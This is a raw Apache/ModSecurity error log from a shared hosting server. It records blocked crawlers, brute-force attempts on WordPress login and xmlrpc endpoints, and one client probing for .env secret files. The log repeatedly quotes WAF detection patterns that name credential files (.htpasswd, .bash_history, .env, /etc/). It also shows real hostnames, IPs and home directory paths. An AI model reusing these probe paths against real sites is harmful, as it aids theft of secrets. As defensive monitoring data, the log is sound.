[Tue May 26 17:15:11.455068 2026] [security2:error] [pid 869189:tid 869339] [client 114.119.136.174:57433] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jhonweb.com"] [uri "/project/ingotcol/"] [unique_id "ahWHx9B5TZSn88J_orrh8AAAABM"], referer: https://www.jhonweb.com/project_category/web-corporativa
[Tue May 26 17:15:11.513746 2026] [security2:error] [pid 869189:tid 869389] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHx9B5TZSn88J_orrh5AAAAEU"]
[Tue May 26 17:15:11.685631 2026] [core:error] [pid 869189:tid 869397] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:11.685650 2026] [core:error] [pid 869189:tid 869397] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:11.820514 2026] [security2:error] [pid 869189:tid 869422] [client 23.158.233.122:51052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.233.158.23.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWHx9B5TZSn88J_orrh_QAAAGY"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 17:15:11.820631 2026] [security2:error] [pid 869189:tid 869422] [client 23.158.233.122:51052] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWHx9B5TZSn88J_orrh_QAAAGY"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 17:15:12.034662 2026] [core:error] [pid 869189:tid 869404] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:12.034685 2026] [core:error] [pid 869189:tid 869404] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:12.264439 2026] [security2:error] [pid 869189:tid 869412] [client 23.158.233.122:51075] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWHyNB5TZSn88J_orriDQAAAFw"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 17:15:13.273764 2026] [security2:error] [pid 869189:tid 869445] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHyNB5TZSn88J_orriIQAAAH0"]
[Tue May 26 17:15:13.440673 2026] [security2:error] [pid 869189:tid 869389] [client 114.119.148.237:25337] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWHydB5TZSn88J_orriLwAAAEU"], referer: http://haddingtonwines.com/cart?remove_item=1138d90ef0a0848a542e57d1595f58ea
[Tue May 26 17:15:14.044615 2026] [security2:error] [pid 869189:tid 869213] [remote 46.101.75.237:55322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWHydB5TZSn88J_orriPAAAWhY"]
[Tue May 26 17:15:14.976086 2026] [security2:error] [pid 869189:tid 869330] [client 63.33.64.32:58880] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.d2cargo.com"] [uri "/"] [unique_id "ahWHytB5TZSn88J_orriWwAAAAo"]
[Tue May 26 17:15:16.183112 2026] [security2:error] [pid 869189:tid 869389] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHy9B5TZSn88J_orribAAAAEU"]
[Tue May 26 17:15:16.223917 2026] [security2:error] [pid 869189:tid 869431] [client 203.194.101.7:53188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHzNB5TZSn88J_orriegAAAG8"]
[Tue May 26 17:15:16.224078 2026] [security2:error] [pid 869189:tid 869431] [client 203.194.101.7:53188] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHzNB5TZSn88J_orriegAAAG8"]
[Tue May 26 17:15:18.483231 2026] [security2:error] [pid 869189:tid 869436] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHztB5TZSn88J_orritgAAAHQ"]
[Tue May 26 17:15:18.675686 2026] [lsapi:warn] [pid 869189:tid 869419] [client 208.91.198.85:58260] [host canopykaapi.com] Backend log: PHP Warning:  mysqli_query(): (HY000/1194): Table 'wpaf_actionscheduler_actions' is marked as crashed and should be repaired in /home2/aarindhr/public_html/canopykaapi.com/wp-includes/class-wpdb.php on line 2357\n
[Tue May 26 17:15:18.675726 2026] [lsapi:warn] [pid 869189:tid 869419] [client 208.91.198.85:58260] [host canopykaapi.com] Backend log: WordPress database error Table 'wpaf_actionscheduler_actions' is marked as crashed and should be repaired for query SELECT count(a.action_id) FROM wpaf_actionscheduler_actions a WHERE 1=1 AND a.status IN ('pending') AND a.scheduled_date_gmt <= '2026-05-26 11:45:18' made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, ActionScheduler_QueueRunner->maybe_dispatch_async_request, ActionScheduler_AsyncRequest_QueueRunner->maybe_dispatch, ActionScheduler_AsyncRequest_QueueRunner->allow, ActionScheduler_Store->has_pending_actions_due, ActionScheduler_HybridStore->query_actions, ActionScheduler_DBStore->query_actions\n
[Tue May 26 17:15:20.104200 2026] [security2:error] [pid 869189:tid 869384] [client 14.185.220.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWHztB5TZSn88J_orriwwAAAEA"]
[Tue May 26 17:15:20.856844 2026] [security2:error] [pid 869189:tid 869386] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH0NB5TZSn88J_orri-wAAAEI"]
[Tue May 26 17:15:23.197010 2026] [security2:error] [pid 869189:tid 869387] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH0tB5TZSn88J_orrjPwAAAEM"]
[Tue May 26 17:15:25.540864 2026] [security2:error] [pid 869189:tid 869408] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH1dB5TZSn88J_orrjdgAAAFg"]
[Tue May 26 17:15:26.736015 2026] [security2:error] [pid 869189:tid 869332] [client 203.194.101.7:53537] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWH1tB5TZSn88J_orrjnAAAAAw"]
[Tue May 26 17:15:26.736169 2026] [security2:error] [pid 869189:tid 869332] [client 203.194.101.7:53537] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWH1tB5TZSn88J_orrjnAAAAAw"]
[Tue May 26 17:15:27.853904 2026] [security2:error] [pid 869189:tid 869436] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH19B5TZSn88J_orrjvgAAAHQ"]
[Tue May 26 17:15:30.122513 2026] [security2:error] [pid 869189:tid 869338] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH2dB5TZSn88J_orrkBgAAABI"]
[Tue May 26 17:15:30.158576 2026] [security2:error] [pid 869189:tid 869335] [client 152.59.41.98:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWH2tB5TZSn88J_orrkMgAAAA8"], referer: https://www.ucdc.co.in/
[Tue May 26 17:15:30.169817 2026] [autoindex:error] [pid 869189:tid 869393] [client 152.59.41.98:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 17:15:31.428042 2026] [security2:error] [pid 869189:tid 869415] [client 146.174.174.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH29B5TZSn88J_orrkSgAAAF8"]
[Tue May 26 17:15:32.512508 2026] [security2:error] [pid 869189:tid 869378] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH3NB5TZSn88J_orrkbAAAADo"]
[Tue May 26 17:15:33.000971 2026] [security2:error] [pid 869189:tid 869316] [remote 209.42.20.53:41826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWH3NB5TZSn88J_orrkgAAAZn0"]
[Tue May 26 17:15:33.077345 2026] [security2:error] [pid 869189:tid 869388] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWH3NB5TZSn88J_orrkcgAAAEQ"]
[Tue May 26 17:15:33.808858 2026] [security2:error] [pid 869189:tid 869356] [client 43.139.137.13:63193] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.137.139.43.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWH3dB5TZSn88J_orrkkAAAACQ"]
[Tue May 26 17:15:34.344931 2026] [security2:error] [pid 869189:tid 869391] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH3dB5TZSn88J_orrkmgAAAEc"]
[Tue May 26 17:15:34.927205 2026] [autoindex:error] [pid 869189:tid 869368] [client 43.153.12.58:53342] AH01276: Cannot serve directory /home2/svijakqj/dglmmm.org.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:15:35.636879 2026] [security2:error] [pid 869189:tid 869350] [client 62.84.185.55:48792] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/robots.txt"] [unique_id "ahWH39B5TZSn88J_orrk0gAAAB4"]
[Tue May 26 17:15:35.637015 2026] [security2:error] [pid 869189:tid 869350] [client 62.84.185.55:48792] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "cicodev.org"] [uri "/robots.txt"] [unique_id "ahWH39B5TZSn88J_orrk0gAAAB4"]
[Tue May 26 17:15:35.747775 2026] [core:crit] [pid 869189:tid 869379] (13)Permission denied: [client 40.77.167.20:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:15:36.607467 2026] [core:crit] [pid 869189:tid 869342] (13)Permission denied: [client 40.77.167.20:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:15:37.013651 2026] [security2:error] [pid 869189:tid 869323] [client 203.194.101.7:53890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWH4dB5TZSn88J_orrk_wAAAAM"]
[Tue May 26 17:15:37.013822 2026] [security2:error] [pid 869189:tid 869323] [client 203.194.101.7:53890] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWH4dB5TZSn88J_orrk_wAAAAM"]
[Tue May 26 17:15:37.368291 2026] [security2:error] [pid 869189:tid 869410] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH4NB5TZSn88J_orrk_QAAAFo"]
[Tue May 26 17:15:37.446462 2026] [security2:error] [pid 869189:tid 869417] [client 207.241.173.124:11248] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4dB5TZSn88J_orrlCwAAAGE"]
[Tue May 26 17:15:38.029078 2026] [security2:error] [pid 869189:tid 869373] [client 207.241.173.124:11248] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/.env"] [unique_id "ahWH4tB5TZSn88J_orrlIQAAADU"]
[Tue May 26 17:15:38.357810 2026] [security2:error] [pid 869189:tid 869407] [client 207.241.173.124:42108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/api/.env"] [unique_id "ahWH4tB5TZSn88J_orrlLwAAAFc"]
[Tue May 26 17:15:38.357895 2026] [security2:error] [pid 869189:tid 869332] [client 207.241.173.124:42098] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/app/.env"] [unique_id "ahWH4tB5TZSn88J_orrlMQAAAAw"]
[Tue May 26 17:15:38.361108 2026] [security2:error] [pid 869189:tid 869385] [client 207.241.173.124:42116] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/backend/.env"] [unique_id "ahWH4tB5TZSn88J_orrlMwAAAEE"]
[Tue May 26 17:15:38.449615 2026] [security2:error] [pid 869189:tid 869403] [client 207.241.173.124:42264] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlKwAAAFM"]
[Tue May 26 17:15:38.451715 2026] [security2:error] [pid 869189:tid 869375] [client 207.241.173.124:42268] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlLgAAADc"]
[Tue May 26 17:15:38.453136 2026] [security2:error] [pid 869189:tid 869423] [client 207.241.173.124:42278] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlLQAAAGc"]
[Tue May 26 17:15:38.454682 2026] [security2:error] [pid 869189:tid 869369] [client 207.241.173.124:42248] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlKAAAADE"]
[Tue May 26 17:15:38.457090 2026] [security2:error] [pid 869189:tid 869424] [client 207.241.173.124:42256] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlLAAAAGg"]
[Tue May 26 17:15:38.461475 2026] [security2:error] [pid 869189:tid 869354] [client 207.241.173.124:42236] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlKgAAACI"]
[Tue May 26 17:15:38.478398 2026] [security2:error] [pid 869189:tid 869341] [client 207.241.173.124:42128] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlMAAAABU"]
[Tue May 26 17:15:38.481299 2026] [security2:error] [pid 869189:tid 869352] [client 207.241.173.124:42230] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlKQAAACA"]
[Tue May 26 17:15:38.482058 2026] [security2:error] [pid 869189:tid 869427] [client 207.241.173.124:42094] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlMgAAAGs"]
[Tue May 26 17:15:38.502133 2026] [security2:error] [pid 869189:tid 869370] [client 207.241.173.124:42136] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlNAAAADI"]
[Tue May 26 17:15:38.662771 2026] [security2:error] [pid 869189:tid 869384] [client 207.241.173.124:42156] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlPwAAAEA"]
[Tue May 26 17:15:38.664345 2026] [security2:error] [pid 869189:tid 869346] [client 207.241.173.124:42184] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlQAAAABo"]
[Tue May 26 17:15:38.665647 2026] [security2:error] [pid 869189:tid 869397] [client 207.241.173.124:42176] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlQQAAAE0"]
[Tue May 26 17:15:38.672016 2026] [security2:error] [pid 869189:tid 869362] [client 207.241.173.124:42166] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlPgAAACo"]
[Tue May 26 17:15:38.675423 2026] [security2:error] [pid 869189:tid 869333] [client 207.241.173.124:42194] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlQgAAAA0"]
[Tue May 26 17:15:38.675688 2026] [security2:error] [pid 869189:tid 869446] [client 207.241.173.124:42270] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH4tB5TZSn88J_orrlRAAAAH4"]
